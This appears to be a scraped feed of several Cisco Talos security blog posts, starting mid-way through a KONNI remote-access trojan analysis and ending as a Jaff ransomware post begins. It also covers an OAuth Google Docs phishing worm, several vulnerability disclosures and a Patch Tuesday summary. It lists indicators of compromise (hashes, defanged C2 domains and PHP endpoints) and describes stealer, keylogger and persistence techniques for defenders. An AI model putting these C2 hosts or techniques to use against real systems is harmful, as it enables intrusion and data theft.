    • Opera profiles and cookies stealer
    The malware internally uses several temporary files:
    • spadmgr.ocx
    • screentmp.tmp (log file of the keylogger)
    • solhelp.ocx
    • sultry.ocx

    2016 Campaign: "How can North Korean hydrogen bomb wipe out Manhattan.scr"


    The name of the .scr file was directly linked to tension between North Korea and USA in March 2016: more information. Based on the compilation dates of the binaries, the campaign took place in the same period. An interesting fact: the dropped library was compiled in 2014 and appears in our telemetry in August 2015. Indicating that this library was probably used in another campaign.

    The .scr file contains 2 Office documents. The first document was in English and a second in Russian. In the sample only the English version can be displayed to the user (that is hardcoded in the sample):
    The Russian document is not used by the sample, we assume that the author of the malware forgot to remove the resource containing the Russia decoy document:
    The malware author changed the malware architecture, this version is divided in two binaries:
    • conhote.dll
    • winnit.exe
    Another difference is the directory where the files are dropped, it's no longer C:\Windows but rather the local setting of the current user (%USERPROFILE%\Local Settings\winnit\winnit.exe). Thanks to this modification, the malware can be executed with a non-administrator account. The .dll file is executed by the .exe file. In this version, a shortcut is created in order to launch winnit.exe in the following path %USERPROFILE%\Start Menu\Programs\Startup\Anti virus service.lnk. As you can see the attacker has went to great lengths to disguise his service as a legitimate Antivirus Service by using the name 'Anti virus service.lnk'. This is of course simple but often it can be enough for a user to miss something malicious by name.

    As in the previous version, the ID of the infected system is generated with exactly the same method. The C2 is different and the analysed version this time only contains a single domain:
    • dowhelsitjs[.]netau[.]net
    In this version, the developer used a different API, the Wininet API which make more sense for Web requests. Moreover the C2 infrastructure evolved too, more .php files are available through the web hosting:
    • <c2-domain>/login.php (for infected machine registration)
    • <c2-domain>/upload.php (for uploading files on the C2)
    • <c2-domain>/download.php (for downloading file from the C2)
    This version includes the stealer features mentioned in the previous version and additionally Remote Administration Tool features such as file uploading/download and arbitrary command execution. The library is only used to perform keylogging and clipboard stealing.  Indeed, the malware author moved this part of the code from the core of the malware to a library. An interesting element is that the malware looks for filenames created with the previous version of KONNI. This implies that the malware targeted the same people as the previous version and they are designed to work together.

    The malware internally uses the following files:
    • solhelp.ocx
    • sultry.ocx
    • helpsol.ocx
    • psltre.ocx
    • screentmp.tmp (log file of the keylogger)
    • spadmgr.ocx
    • apsmgrd.ocx
    • wpg.db

    2017 Campaigns


    Pyongyang Directory Group email April 2017 RC_Office_Coordination_Associate.scr

    In this campaign, the malware author uses the following name: Pyongyang Directory Group email April 2017 RC_Office_Coordination_Associate.scr. The decoy document shown after infection is an Office document containing email addresses, phone numbers and contacts of members of official organizations such as the United Nations, UNICEF, Embassies linked to North Korea.

    The .scr files drops two files: an executable and a library. As in the previous version, the persistence is achieved by a Windows shortcut (in this case adobe distillist.lnk). Contrary to the previous version, the developers moved the core of malware to the library. The executable performs the following tasks:
    • If the system is a 64-bit version of Windows, it downloads and executes a specific 64-bit version of the malware thanks to a powershell script:


    • Loading the dropped library

    The library contains the same features as the previous version as well as new ones. This version of KONNI is the most advanced with better coding. The malware configuration contains one Command and Control:
    • pactchfilepacks[.]net23[.]net
    A new URI is available:
    • <c2-domain>/uploadtm.php
    This URI is used with a new feature implemented in this version: the malware is able to perform screenshot (thanks to the GDI API) and uploads it thank to this URL. The malware checks if a file used on a previous version of KONNI is available on the system. Here is the complete list of files internally used by the RAT:
    • error.tmp (the log file of the keylogger)
    • tedsul.ocx
    • helpsol.ocx
    • trepsl.ocx
    • psltred.ocx
    • solhelp.ocx
    • sulted.ocx
    The handling of instructions has improved too. Here are the 7 actions that the infected machine can be instructed to perform:
    • Delete a specific file;
    • Upload a specific file based on a filename;
    • Upload a specific file based on the full path name;
    • Create a screenshot and uploads it on the C2;
    • Get system information;
    • Download a file from the Internet;
    • Execute a command;
    This graph shows the decision tree:

    When the attacker wants to gather information on the infected system (action 5), it retrieves the following information:
    • Hostname
    • IP address
    • Computer name
    • Username name
    • Connected drive
    • OS version
    • Architecture
    • Start menu programs
    • Installed software

    Inter Agency List and Phonebook - April 2017 RC_Office_Coordination_Associate.scr

    The last identified campaign where KONNI was used was named Inter Agency List and Phonebook - April 2017 RC_Office_Coordination_Associate.scr. This file drops exactly the same files than the previous campaign but the decoy document is different:
    This document contains the name, phone number and email address of members of agencies, embassies and organizations linked to North Korea.

    Conclusion


    The analysis shows us the evolution of KONNI over the last 3 years. The last campaign was started a few days ago and is still active. The infrastructure remains up and running at the time of this post. The RAT has remained under the radar for multiple years. An explanation could be the fact that the campaign was very limited nature, which does not arouse suspicion.

    This investigation shows that the author has evolved technically (by implementing new features) and in the quality of the decoy documents. The campaign of April 2017 used pertinent documents containing potentially sensitive data. Moreover the metadata of the Office document contains the names of people who seems to work for a public organization. We don't know if the document is a legitimate compromised document or a fake that the attacker has created in an effort to be credible.

    Clearly the author has a real interest in North Korea, with 3 of the 4 campaigns are linked to North Korea.

    The following graph show the evolution of KONNI over the last 3 years:

    Coverage


    Additional ways our customers can detect and block this threat are listed below.

    Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

    CWS orWSA web scanning prevents access to malicious websites and detects malware used in these attacks.

    Email Security can block malicious emails sent by threat actors as part of their campaign.

    The Network Security protection ofIPS andNGFW have up-to-date signatures to detect malicious network activity by threat actors.

    AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

    Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network

    IOCs

    2014 Campaign: Fatal Beauty

    Dropper
    SHA256: 413772d81e4532fec5119e9dce5e2bf90b7538be33066cf9a6ff796254a5225f
    Filename: beauty.scr
    Dropped files
    #1
    SHA256: eb90e40fc4d91dec68e8509056c52e9c8ed4e392c4ac979518f8d87c31e2b435
    Filename: C:\Windows\beauty.jpg
    File type: JPEG image data, JFIF standard 1.02

    #2
    SHA256: 44150350727e2a42f66d50015e98de462d362af8a9ae33d1f5124f1703179ab9
    Hilename: C:\Windows\svchost.exe
    File type: PE32 executable (GUI) Intel 80386, for MS Windows
    CC
    phpschboy[.]prohosts[.]org
    jams481[.]site[.]bz

    2016 Campaign: How can North Korean hydrogen bomb wipe out Manhattan

    Dropper
    SHA256: 94113c9968db13e3412c1b9c1c882592481c559c0613dbccfed2fcfc80e77dc5
    Filename: How can North Korean hydrogen bomb wipe out Manhattan.scr
    Dropped
    #1
    SHA256: 56f159cde3a55ae6e9270d95791ef2f6859aa119ad516c9471010302e1fb5634
    Filename: conhote.dll

    #2
    SHA256: 553a475f72819b295927e469c7bf9aef774783f3ae8c34c794f35702023317cc
    Filename: winnit.exe

    #3
    SHA256: 92600679bb183c1897e7e1e6446082111491a42aa65a3a48bd0fceae0db7244f
    Filename: Anti virus service.lnk
    CC
    dowhelsitjs[.]netau[.]net

    2017 Campaign A:

    Dropper
    SHA256: 69a9d7aa0cb964c091ca128735b6e60fa7ce028a2ba41d99023dd57c06600fe0
    Filename: Pyongyang Directory Group email April 2017 RC_Office_Coordination_Associate.scr

    Dropped
    #1
    SHA256: 3de491de3f39c599954bdbf08bba3bab9e4a1d2c64141b03a866c08ef867c9d1
    Filename: adobe distillist.lnk

    #2
    SHA256: 39bc918f0080603ac80fe1ec2edfd3099a88dc04322106735bc08188838b2635
    Filename: winload.exe

    #3
    SHA256: dd730cc8fcbb979eb366915397b8535ce3b6cfdb01be2235797d9783661fc84d
    Filename: winload.dll
    CC
    Pactchfilepacks[.]net23[.]net
    checkmail[.]phpnet[.]us

    2017 Campaign B:

    Dropper
    SHA256: 640477943ad77fb2a74752f4650707ea616c3c022359d7b2e264a63495abe45e
    Filename: Inter Agency List and Phonebook - April 2017 RC_Office_Coordination_Associate.scr

    Dropped
    #1
    SHA256: 4585584fe7e14838858b24c18a792b105d18f87d2711c060f09e62d89fc3085b
    Filename: adobe distillist.lnk

    #2
    SHA256: 39bc918f0080603ac80fe1ec2edfd3099a88dc04322106735bc08188838b2635
    Filename: winload.exe

    #3
    SHA256: dd730cc8fcbb979eb366915397b8535ce3b6cfdb01be2235797d9783661fc84d
    Filename: winload.dll
    CC
    Pactchfilepacks[.]net23[.]net
    checkmail[.]phpnet[.]us

    Related samples

    413772d81e4532fec5119e9dce5e2bf90b7538be33066cf9a6ff796254a5225f
    44150350727e2a42f66d50015e98de462d362af8a9ae33d1f5124f1703179ab9
    553a475f72819b295927e469c7bf9aef774783f3ae8c34c794f35702023317cc
    56f159cde3a55ae6e9270d95791ef2f6859aa119ad516c9471010302e1fb5634
    94113c9968db13e3412c1b9c1c882592481c559c0613dbccfed2fcfc80e77dc5
    f091d210fd214c6f19f45d880cde77781b03c5dc86aa2d62417939e7dce047ff
    0f327d67b601a87e575e726dc67a10c341720267de58f3bd2df3ce705055e757
    234f9d50aadb605d920458cc30a16b90c0ae1443bc7ef3bf452566ce111cece8
    39bc918f0080603ac80fe1ec2edfd3099a88dc04322106735bc08188838b2635
    581e820637decf37bfd315c6eb71176976a0f2d59708f2836ff969873b86c7db
    640477943ad77fb2a74752f4650707ea616c3c022359d7b2e264a63495abe45e
    69a9d7aa0cb964c091ca128735b6e60fa7ce028a2ba41d99023dd57c06600fe0
    97b1039612eb684eaec5d21f0ac0a2b06b933cc3c078deabea2706cb69045355
    dae9d8f9f7f745385286775f6e99d3dcc55bbbe47268a3ea20deffe5c8fd0f0e
    dd730cc8fcbb979eb366915397b8535ce3b6cfdb01be2235797d9783661fc84d
    e6a9d9791f763123f9fe1f69e69069340e02248b9b16a88334b6a5a611944ef9
    ead47df090a4de54220a8be27ec6737304c1c3fe9d0946451b2a60b8f11212d1

    Gmail Worm Requiring You To Give It A Push And Apparently You All Are Really Helpful

    $
    0
    0
    This post authored by Sean Baird and Nick Biasini

    Attackers are always looking for creative ways to send large amount of spam to victims. A short-lived, but widespread Google Drive themed phishing campaign has affected a large number of users across a variety of verticals. This campaign would be bcc'd to a target while being sent to hhhhhhhhhhhhhhhh@mailinator[.]com, to make this email appear legitimate the sender would be someone who had the target in their address book.

    Mailinator is a "free, public, email system where you can use any inbox you want," often used for throwaway accounts. In this instance, the Mailinator inbox in question could have been used by the spammer to monitor whether or not the email was successfully sent. The use of Mailinator, however, is not what made this campaign unique.


    Campaign Details

    The malicious email
    As you can see, the email is pretty standard for a phishing attempt. In this case, they were targeting Google specifically and have done so via Google Docs. Typically, what you would see is a link to a "cloned" site that is used to harvest the username and password for the targeted service, in this case Google. However, this campaign took a completely different approach.

    The "Open in Docs" link contained in the email directed the recipient to a legitimate Google site which required log-in with Google credentials. Upon entering the site, a service called "Google Docs" requested permission to "Read, send, delete, and manage" email and contacts. This is a legitimate request and is part of a lot of applications that make use of google as an authentication mechanism. The portion that is not normal are the permissions that are being requested.
    The OAuth service named "Google Docs" requesting permissions
    After clicking allow (and waiting a significant amount of time), We were directed to h[xx]ps://googledocs[.]g-cloud[.]win/. In this attack, we identified several other malicious hosts, including:
    • docscloud[.]download
    • docscloud[.]info
    • docscloud[.]win
    • gdocs[.]download
    • docscloud[.]info
    • g-docs[.]pro
    • gdocs[.]pro
    • gdocs[.]win
    • docscloud[.]download
    • g-cloud[.]win
    • g-cloud[.]pro
    Currently these requests result in an HTTP 502 response. This would happen due to too many users trying to access the site at once, or because Cloudflare took down the impacted sites.
    The 502 Error on the destination page.
    Talos was able to identify other instances of users interacting with the page and receiving data. A brief analysis of this data did not return anything inherently malicious including a true malicious payload or POST requests indicating additional credential theft.

    This attack was notable due the sheer volume and velocity at which it was executed. What started as a trickle of emails quickly became a deluge resulting in a prime area of focus on Twitter and in the security community. Due to its relentless nature it got everyone's attention.

    The volume being reported to us over roughly two hours of the attack (Eastern).

    Purpose


    The goal of this attack is likely two-fold. This instance acted as potential proof-of-concept for a convincing Google phish via OAuth. Second, and more concerning, this attack allowed the OAuth owner access to all of the email content and contact information for every compromised victim of the attack. This means that the attacker potentially has access to all of the information within your account and the ability to read, send, delete and manage the email and contacts of the associated account. Additionally, since OAuth was used, the typical protections like changing passwords has no immediate impact on the adversaries access.

    Mitigation and Protections

    Because of the success of this attack, we are likely going to see phishing attacks of this nature for the foreseeable future. Users must be very careful what they click on, particularly when it involves passwords or granting permissions or access of some kind. If in doubt, reach out to the sender of the attachment or link using a means other than email to verify the integrity of their email.

    If you have fallen for this attack you should go into your Google account settings and revoke permissions from the rogue fake Google Docs service. You should then change your password immediately.

    In addition, as the attacker had access to all of your email content, you should take measures to prevent secondary attacks, such as identity theft and blackmail.

    IOC

    Domains:
    • docscloud[.]download
    • docscloud[.]info
    • docscloud[.]win
    • gdocs[.]download
    • docscloud[.]info
    • g-docs[.]pro
    • gdocs[.]pro
    • gdocs[.]win
    • docscloud[.]download
    • g-cloud[.]win
    • g-cloud[.]pro

    Conclusion

    Adversaries will remain vigilant in figuring out creative ways to deliver spam or malware to end users. This is just the latest example of a clever way to achieve this goal. Like all other creative, novel approaches it will likely be heavily copied almost immediately. Google is just one example, but there are likely other services that are used to as alternative authentication mechanisms. Two likely candidates are Facebook and LinkedIn. It's highly likely that similar attacks leveraging those types of credentials could follow in addition to a continued Google attack vector.

    Cisco Cloudlock has identified more than 275,000 OAuth applications connected to core cloud services such as Microsoft Office 365.  This compares to just 5,500 such applications just 3 years ago.  It’s likely that similar attacks leveraging these types of credentials will follow and that the Google attack vector will be continue to be utilized. For more information on Cloudlock and to see their perspective on this threat please visit their blog here.

    Another thing to keep in mind is this adversary likely did not anticipate the velocity with which this attack would follow. This was a loud and noisy version and subtle, low volume attacks are likely to follow. This again points to some basic security principles. Namely, don't trust email, no matter how legitimate looking, do not allow 3rd parties have access to any of your accounts. In the instance where the option exists to either login with an existing 3rd party account or create a new account, create the new account. It may take a little additional time, but it can prevent a catastrophic compromise of your email and contacts.

    Coverage

    Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

    Cloudlock, our CASB solution specifically identifies, classifies and mitigates risks related to OAuth connected applications.

    CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

    Email Security can block malicious emails sent by threat actors as part of their campaign.

    The Network Security protection of IPS and NGFW have up-to-date signatures to detect malicious network activity by threat actors.

    AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

    Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network

    Vulnerability Spotlight: AntennaHouse DMC Library Arbitrary Code Execution Flaws

    $
    0
    0
    These vulnerabilities were discovered by Marcin 'Icewall' Noga of Talos.

    Today, Talos is disclosing several vulnerabilities that have been identified in the AntennaHouse DMC library which is used in various products for web-based document searching and rendering. These vulnerabilities manifest as a failure to correctly parse Microsoft Office documents and could be exploited to achieve arbitrary code execution. These vulnerabilities are being disclosed in coordination with AntennaHouse.

    Vulnerability Details

    Multiple heap corruption vulnerabilities exist within AntennaHouse DMC HTMLFilter that could be exploited to achieve arbitrary code execution on the targeted machine. These vulnerabilities manifest due to improper handling of Microsoft Office documents, such as Word and PowerPoint files. An adversary that passes a specifically crafted document to the converter could exploit one of these vulnerabilities. Note that the method that an adversary could compromise a vulnerable machine varies as this library is known to be incorporated into other third-party products.


    For the full technical details regarding these vulnerabilities, please refer to the full vulnerability advisories which can be found below:



    Coverage

    Talos has released rules that detect attempts to exploit these vulnerabilities to protect our customers. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

    Snort Rules: 40789-40790, 40927-40932, 41511-41512, 41543-41546, 41703-41704, 41726-41727, 41753-41754, 41759-41760, 41765-41766

    For the full technical details regarding these and other vulnerabilities, please visit our vulnerability reports portal on our website:

    http://www.talosintelligence.com/vulnerability-reports/

    Vulnerability Spotlight: Power Software PowerISO ISO Code Execution Vulnerabilities

    $
    0
    0
    These vulnerabilities were discovered by Piotr Bania of Cisco Talos.

    Today, Talos is releasing details of a new vulnerability discovered within the Power Software PowerISO disk imaging software. TALOS-2017-0318 and TALOS-2017-0324 may allow an attacker to execute arbitrary code remotely on the vulnerable system when a specially crafted ISO image is opened and parsed by the PowerISO software.

    Overview


    The vulnerabilities are present in the Power Software PowerISO disk imaging utility, used by Windows users to create, edit, mount and convert various popular disk image file formats. The software is commonly used by home users to mount ISO disk images since this capability is not included by default in Windows versions prior to version 8.

    ISO (9660) disk image format is a file system within a single file. Essentially, it is a binary copy of the file system used by the standard software CD-ROM installation disks. Today, most of the installation disks for popular software and operating systems are distributed using the ISO file format.


    TALOS-2017-0318 - Power Software PowerISO ISO Code Execution Vulnerability (CVE-2017-2817)


    A stack buffer overflow vulnerability exists in the ISO image parsing functionality of Power Software Ltd PowerISO disk imaging software. A specially crafted .ISO file can cause a vulnerability resulting in potential code execution. An attacker can send specific .ISO file to trigger this vulnerability. More details of the vulnerability can be found in the report TALOS-2017-0318.

    TALOS-2017-0324 - PowerISO ISO Parsing Use After Free Vulnerability (CVE-2017-2823)


    A use-after-free vulnerability exists in the .ISO parsing functionality of PowerISO 6.8. A specially crafted .ISO file can cause a vulnerability resulting in potential code execution. An attacker can send a specific .ISO file to trigger this vulnerability. More details about the discovered vulnerability are available in the report TALOS-2017-0324

    Known vulnerable versions


    PowerISO 6.8.

    Discussion


    ISO 9660 file format is one of the older formats and its original specification contains several limitations on the file name length, directory depth as well as the maximum file size. These limitations are inherited from older operating systems. Specifically, filename lengths in ISO 9660 file system are limited to maximum 8 characters with maximum 3 characters reserved for the file extension.

    Over time, various extensions have been developed to overcome the limitation of the original file format specification. One of the extensions, so called Rock Ridge extension, allows for alternative names to the original file. The alternative name can be longer than the default 8 characters.

    A vulnerability in PowerISO software exists when parsing the alternative name (NM) System Use Entry. The structure of the alternative name contains a single byte length field which can be manipulated by the attacker to cause a stack buffer overflow that may allow remote code execution of code in the context of the PowerISO user.

    Although third party disk image utilities can be useful in many cases, it is worth checking if the default operating system functionality satisfies user's needs. Specifically, Windows 8 and later has the built-in capability to mount ISO images, which may remove the need for third party disk imaging utilities.

    Users that still have a requirement for a third party disk imaging software should ensure that security updates are applied for the product as soon as they are released to remediate potential attack vectors.

    Coverage


    The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

    Snort Rules: 42263-42272 (TALOS-2017-0318)
    42321,42322 (TALOS-2017-0324)

    Vulnerability Spotlight: WolfSSL library X.509 Certificate Text Parsing Code Execution Vulnerability

    $
    0
    0
    Discovered by Aleksandar Nikolic of Cisco Talos

    Overview

    Talos is disclosing TALOS-2017-0293 / CVE 2017-2800, a code execution vulnerability in WolfSSL. WolfSSL is a lightweight SSL/TLS library targeted specifically for embedded and RTOS (Real-Time Operating System) environments, due largely to its small size and performance. WolfSSL is used in a wide range of products including ICS and IoT devices.

    This particular vulnerability is related to the use of x.509 certificates and the code that deals with string fields in DER certificates. Specifically the code responsible for parsing 'commonName', 'countryName', 'localityName', 'stateName', 'orgName', and 'orgUnit'. A specially crafted x.509 certificate can cause a single out-of-bounds overwrite that could result in certificate validation issues, denial of service, or remote code execution. To trigger this vulnerability, the adversary needs to supply a malicious x.509 certificate to either the server or client application that is making use of this library. The full details surrounding the vulnerability are available here.

    Coverage

    The following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

    Snort Rule: 42000

    Microsoft Patch Tuesday - May 2017

    $
    0
    0
    Today, Microsoft has release their monthly set of security updates designed to address vulnerabilities. This month's release addresses 56 vulnerabilities with 15 of them rated critical and 41 rated important. Impacted products include .NET, DirectX, Edge, Internet Explorer, Office, Sharepoint, and Windows.

    In addition to the coverage Talos is providing for the normal monthly Microsoft security advisories, Talos is also providing coverage for CVE-2017-0290, the MsMpEng Malware Protection service vulnerability in Windows reported by Natalie Silvanovich and Tavis Ormandy of Google Project Zero. Snort rule SIDs for this specific vulnerability are 42820-42821.


    Vulnerabilities Rated Critical

    The following vulnerabilities are rated critical by Microsoft:
    • CVE-2017-0221
    • CVE-2017-0222
    • CVE-2017-0224
    • CVE-2017-0227
    • CVE-2017-0228
    • CVE-2017-0229
    • CVE-2017-0235
    • CVE-2017-0236
    • CVE-2017-0240
    • CVE-2017-0266
    • CVE-2017-0272
    • CVE-2017-0277
    • CVE-2017-0278
    • CVE-2017-0279
    • CVE-2017-0290

    These vulnerabilities are broken out by affected software below.

    Adobe Flash

    Adobe has released a security update for Flash Player addressing memory corruption vulnerabilities that could result in remote code execution if exploited. Windows is impacted by these vulnerabilities as Flash Player is integrated into Internet Explorer and Edge in Windows 8 and 10. For further details, please refer to Adobe's Flash Player security bulletin here.

    Internet Explorer/Edge

    Multiple memory corruption vulnerabilities have been identified in Internet Explorer, Edge, and the Scripting Engine component utilized by both browsers. These vulnerabilities manifest due to the way Internet Explorer, Edge, and Chakra (the scripting engine) handle objects in memory. Exploitation of these vulnerabilities could yield arbitrary code execution in the context of the current user's privileges if the user navigates to a specifically crafted web page.

    CVEs: CVE-2017-0221, CVE-2017-0222, CVE-2017-0224, CVE-2017-0227, CVE-2017-0228, CVE-2017-0229, CVE-2017-0235, CVE-2017-0236, CVE-2017-0240, CVE-2017-0266

    Windows SMB

    Multiple vulnerabilities have been identified in Microsoft Server Message Block (SMB) 1.0 that could allow an attacker to execute arbitrary code on the targeted host. Per Microsoft's advisories, an unauthenticated attacker could exploit these vulnerabilities via specifically crafted packets being transmitted to a vulnerable SMBv1 server.

    CVEs: CVE-2017-0272, CVE-2017-0277, CVE-2017-0278, CVE-2017-0279

    Microsoft Malware Protection Engine

    A vulnerability has been identified in the Microsoft Malware Protection Engine that could lead to arbitrary code execution in the context of the kernel. This vulnerability, CVE-2017-0290, manifests due to the Malware Protection engine improperly scanning specifically crafted files. Exploitation of this flaw is achievable by opening an email containing a malicious file, visiting a malicious website that exploits this vulnerability, or by downloading a maliciously crafted file.

    Microsoft has released an engine update separate from a bulletin that addresses this issue. Users and administrators should note that no action is typically required for updates for the Malware Protection Engine as updates are normally applied within 48 hours of the release. For further details, please see Microsoft's security advisory.

    Vulnerabilities Rated Important

    The following vulnerabilities are rated important by Microsoft:
    • CVE-2017-0064
    • CVE-2017-0077
    • CVE-2017-0171
    • CVE-2017-0175
    • CVE-2017-0190
    • CVE-2017-0212
    • CVE-2017-0213
    • CVE-2017-0214
    • CVE-2017-0220
    • CVE-2017-0226
    • CVE-2017-0230
    • CVE-2017-0231
    • CVE-2017-0233
    • CVE-2017-0234
    • CVE-2017-0238
    • CVE-2017-0241
    • CVE-2017-0242
    • CVE-2017-0244
    • CVE-2017-0245
    • CVE-2017-0246
    • CVE-2017-0248
    • CVE-2017-0254
    • CVE-2017-0255
    • CVE-2017-0258
    • CVE-2017-0259
    • CVE-2017-0261
    • CVE-2017-0262
    • CVE-2017-0263
    • CVE-2017-0264
    • CVE-2017-0265
    • CVE-2017-0267
    • CVE-2017-0268
    • CVE-2017-0269
    • CVE-2017-0270
    • CVE-2017-0271
    • CVE-2017-0273
    • CVE-2017-0274
    • CVE-2017-0275
    • CVE-2017-0276
    • CVE-2017-0280
    • CVE-2017-0281

    These vulnerabilities are broken out by affected software below.

    .NET

    A security feature bypass vulnerability has been identified and patched in the .NET Core and .NET Framework. CVE-2017-0248 manifests due to .NET core and .NET component failing to completely validate certificates. Exploitation of this flaw could occur where an attacker presents a certificate which is not valid for a specific use, but is still utilized for that purpose.

    DirectX

    A privilege escalation vulnerability in the DirectX graphics kernel subsystem (dxgkrnl.sys) has been identified and patched. CVE-2017-0077 manifests due to the way objects in memory are incorrectly handled. Exploitation of the flaw is achievable if a user runs a specifically written application that exploits this flaw.

    Microsoft Browser

    Multiple vulnerabilities have been identified and patched in Microsoft Internet Explorer and Edge. Two of the vulnerabilities (CVE-2017-0233, CVE-2017-0241) are privilege escalation vulnerabilities in Edge, one is a memory corruption flaw in IE (CVE-2017-0226), one is a security feature bypass in IE (CVE-2017-0064), one is a browser spoofing vulnerability (CVE-2017-0231), and one is a ActiveX information disclosure flaw (CVE-2017-0242).

    Office

    Multiple arbitrary code execution vulnerabilities have been identified and patched in Microsoft Office for Mac and PC. These vulnerabilities manifest due to incorrectly handling objects in memory, resulting in memory corruption and arbitrary code execution in the context of the current privilege level. Exploitation of the these flaws achievable if a victim opens a specifically crafted Office document with a vulnerable version of Office on the host system. Attack vectors where this could be exploited included email-based attack where the user opens a malicious attachment from an attacker.

    CVEs: CVE-2017-0254, CVE-2017-0261, CVE-2017-0262, CVE-2017-0264, CVE-2017-0265, CVE-2017-0281

    Sharepoint

    A cross-site scripting (XSS) vulnerability has been identified and patched in Sharepoint Foundation 2013. CVE-2017-0255 manifests due to improperly sanitizing web requests to an affected server, potentially allowing an attacker to run scripts in the context of the current user. Exploiting the vulnerability could allow an attacker to read sensitive information or perform actions on behalf of the targeted user.

    Win32k

    Three vulnerabilities have been identified and patched in the Win32k subsystem that could allow an attacker to gain elevated privileges or gain sensitive information regarding the system. Two of the vulnerabilities (CVE-2017-0246, CVE-2017-0263) are privilege escalation flaws while the third vulnerability (CVE-2017-0245) is an information disclosure vulnerability that could expose sensitive information about the system. All three vulnerabilities manifest due the kernel-mode driver failing to properly handle object in memory and could be exploited by executing a specifically written application.

    Windows COM

    Two privilege escalation vulnerabilities (CVE-2017-0213 and CVE-2017-0214) in Windows Component Object Model (COM) have been identified and patched. CVE-2017-0213 manifests in the Windows COM Aggregate Marshaller due to how the COM Marshaller processes interface requests. CVE-2017-0214 manifests as a failure to properly validate input before loading libraries and could be exploited when loading type libraries.

    Windows DNS

    A denial of service vulnerability (CVE-2017-0171) in Windows DNS Server has been identified and patched. CVE-2017-0171 manifests due to incorrectly handling DNS queries "if the server is configured to answer version queries." As a result, a remote attacker could exploit this vulnerability and cause the host to become unresponsive.

    Windows GDI

    A information disclosure vulnerability in the Windows Graphics Device Interface (GDI) has been identified and patched that could allow an attacker to gain information about the targeted system. The vulnerability (CVE-2017-0190) itself does not permit an attacker to execute arbitrary code on the targeted system. However, exploiting this vulnerability in conjunction with another flaw could allow an attacker to execute arbitrary code.

    Windows Hyper-V

    A privilege escalation vulnerability has been identified and patched in Windows Hyper-V. The vulnerability in question, CVE-2017-0212, is a flaw where the host server fails to properly handle vSMB packets.

    Windows Kernel

    Five vulnerabilities have been identified and fixed in the Windows Kernel with four of them being information disclosure flaws and one of them being a privilege escalation vulnerability. All five vulnerabilities manifest due to the way object are incorrectly handled in memory.

    A user who executes a specifically written application could exploit these vulnerabilities and gain information to further compromise the host (in the case of the information disclosure vulnerabilities), or gain elevated privileges that could be used to gain full control of the affected system. Note that for the privilege escalation vulnerability (CVE-2017-0244), x86-64 based systems will suffer from a denial of service instead of a privilege escalation.

    CVEs: CVE-2017-0175, CVE-2017-0220, CVE-2017-0244, CVE-2017-0258, CVE-2017-0259

    Windows SMB

    Multiple vulnerabilities have been identified in Microsoft Server Message Block (SMB) 1.0 that could result a denial of service or information leakage on affected hosts. These vulnerabilities manifest as a result of an affected host incorrectly processing SMBv1 requests.

    CVEs: CVE-2017-0267, CVE-2017-0268, CVE-2017-0269, CVE-2017-0270, CVE-2017-0271, CVE-2017-0273, CVE-2017-0274, CVE-2017-0275, CVE-2017-0276, CVE-2017-0280

    Coverage

    In response to these bulletin disclosures, Talos is releasing the following rules to address these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Management Center or Snort.org.

    Snort Rules:

    • 42749-42785
    • 42798-42799
    • 42811-42812
    • 42820-42821 (for CVE-2017-0290)


    Vulnerability Spotlight: Hangul Word Processor Remote Code Execution Vulnerability

    $
    0
    0
    Vulnerability discovered by Rich Johnson of Talos.

    Overview


    Published by Hancom inc. the Hangul Office Suite, of which Hangul Word Processor is part, is the leading word processing and office productivity suite in South Korea. This vulnerability allows attackers to craft a malicious document that when opened, allows the attacker to cause arbitrary code to be executed on the victim’s system.

    TALOS-2017-0320 (CVE-2017-2819) Hangul Word Processor Buffer Overflow Vulnerability


    Hangul Word Processor documents uses a structured format to store the various objects that comprise the final document. When opening a document the software reads metadata tags which describe the object properties, and calculates the memory necessary to store each object.
    The record, HWPTAG_TAB_DEF describes information about the tab definitions within the document. The header information in this section describes how much memory is required to load the relevant data section. However, a value can be included in the header which leads to the heap buffer used in the previous tab definition being re-used without being resized. This leads to a buffer overflow condition as the contents of the tab section are written outside of the allocated buffer onto the heap, ultimately leading to remote code execution.

    More details can be found in the vulnerability reports: TALOS-2017-0320.

    Know vulnerable versions: Hancom Office 2014 version 9.1.0.2172

    Discussion


    Hangul Word Processor documents are a favourite vector of threat actors targeting users in South Korea. We have recently written about two examples of such threats, here and here. Vulnerabilities in office productivity software are useful to attackers who can use file formats which are frequently distributed over email to target their victims. Users should ensure that all software, including office productivity suites are kept up to patch to ensure that attackers are unable to use such vulnerabilities to compromise systems.

    Coverage

    The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.
    Snort Rules: 35832 - 35833

    Jaff Ransomware: Player 2 Has Entered The Game

    $
    0
    0
    This post was written by Nick Biasini, Edmund Brumaghin and Warren Mercer with contributions from Colin Grady

    Summary


    Talos is constantly monitoring the email threat landscape and tracking both new threats as well as changes to existing threats. We recently observed several large scale email campaigns that were attempting to distribute a new variant of ransomware that has been dubbed "Jaff". Interestingly we identified several characteristics that we have previously observed being used during Dridex and Locky campaigns. In a short period of time, we observed multiple campaigns featuring high volumes of malicious spam emails being distributed, each using a PDF attachment with an embedded Microsoft Word document functioning as the initial downloader for the Jaff ransomware. While Cisco customers were already automatically protected against this threat, we decided to take a deeper look at this threat and its possible implications across the threat landscape. We have outlined the infection process and additional relevant information regarding this threat in detail below.

    Infection Process


